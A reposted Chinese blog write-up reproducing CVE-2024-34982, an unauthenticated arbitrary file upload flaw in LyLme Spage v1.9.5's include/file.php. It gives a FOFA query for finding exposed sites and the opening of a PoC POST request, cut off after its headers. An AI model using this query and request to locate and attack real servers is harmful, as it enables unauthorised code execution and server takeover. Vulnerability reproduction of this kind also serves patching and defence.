0


六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982)

0x01 产品简介

LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。

0x02 漏洞概述

六零导航页 file.php接口处任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 影响范围

LyLme Spage v1.9.5

0x04 复现环境

FOFA:title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

POST /include/file.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Reques
标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_41904294/article/details/139027012
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。

“六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982)”的评论:

还没有评论